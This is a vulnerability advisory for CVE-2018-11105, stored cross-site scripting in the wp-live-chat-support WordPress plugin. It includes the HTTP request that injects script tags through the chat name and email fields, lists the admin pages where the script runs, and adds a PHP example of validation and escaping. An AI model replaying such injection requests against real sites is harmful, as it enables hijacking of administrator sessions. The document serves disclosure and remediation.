CVE-2018-11105
[Suggested description]
There is stored cross-site scripting in the wp-live-chat-support plugin before 8.0.08 for
WordPress via the "name" (aka wplc_name) and "email" (aka wplc_email) input fields
when an attacker initiates a new chat with an administrator.
NOTE: this issue exists because of an incomplete fix for CVE-2018-9864.
[Additional Information]
The following POST request was used to deliver the XSS payload (placeholders in angle brackets stand for per-session values):
```http
POST /wp-json/wp_live_chat_support/v1/start_chat HTTP/1.1
...
header info
...
Connection: close

relay_action=wplc_new_chat&
security=<token>&
cid=<cid>&
wplc_name=<script>alert("evil payload in name");</script>&
wplc_email=<script>alert("evil payload in mail");</script>&
wplc_extra_data%5Bobject_switch%5D=1&
url=http%3A%2F%2Flocalhost%3A8000%2F&
session=<session>&
server_token=<token>&
token=<token>&_wpnonce=<nonce>
```
Notice that the wplc_name and wplc_email fields were used to deliver the payload to the WordPress backend.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
CodeCabin_ / WP-livechat
[Affected Product Code Base]
WP live chat support - All versions < 8.0.08
[Affected Component]
WP live chat support - all versions < 8.0.08
[Attack Type]
Remote
[CVE Impact Other]
Stored Cross Site Scripting
[Attack Vectors]
An attacker who initiates a chat with an administrator can abuse the
"name" and "email" form fields presented by the wp-live-chat plugin to
inject JavaScript. After the chat is either ended or missed by the
administrator, interaction with the following pages will trigger the
injected JavaScript:
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu-history
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id>
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu-missed-chats
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id>
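The following is an added example of how the two abused fields can be handled safely on both the input side (the start_chat REST route) and the output side (the admin history pages listed above). It is not code from the wp-live-chat-support plugin; the `example_` function names and the mailto rendering are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. The hypothetical "example_"
// functions show input validation on the public start_chat route and
// escaping at the admin render site, the two places this bug lives.

add_action( 'rest_api_init', function () {
    register_rest_route( 'wp_live_chat_support/v1', '/start_chat', array(
        'methods'             => 'POST',
        'callback'            => 'example_start_chat',
        'permission_callback' => '__return_true', // chat visitors are unauthenticated by design
        'args'                => array(
            // Input side: strip tags from the name, reject anything that is not an e-mail.
            // WordPress runs validate_callback on the raw value, then sanitize_callback.
            'wplc_name'  => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
                'validate_callback' => function ( $value ) {
                    return is_string( $value ) && '' !== trim( $value ) && mb_strlen( $value ) <= 100;
                },
            ),
            'wplc_email' => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_email',
                'validate_callback' => function ( $value ) {
                    return is_string( $value ) && false !== is_email( $value );
                },
            ),
        ),
    ) );
} );

function example_start_chat( WP_REST_Request $request ) {
    // Both parameters have already passed validation and sanitization here.
    $name  = $request->get_param( 'wplc_name' );
    $email = $request->get_param( 'wplc_email' );
    // Persisting the chat record is the plugin's concern; the cleaned values are returned.
    return rest_ensure_response( array( 'name' => $name, 'email' => $email ) );
}

// Output side: escape at every admin render site (history, missed chats, chat
// detail) regardless of what was done on input. A single unescaped sink is
// enough for stored XSS, which is what an incomplete fix typically leaves behind.
function example_render_history_row( array $chat ) {
    printf(
        '<tr><td>%s</td><td><a href="%s">%s</a></td></tr>',
        esc_html( $chat['name'] ),
        esc_url( 'mailto:' . $chat['email'] ),
        esc_html( $chat['email'] )
    );
}
```

With these in place the request shown above is rejected at the route (the email value fails `is_email`), and even a record stored by an older version renders as inert text in the history pages.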
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-11105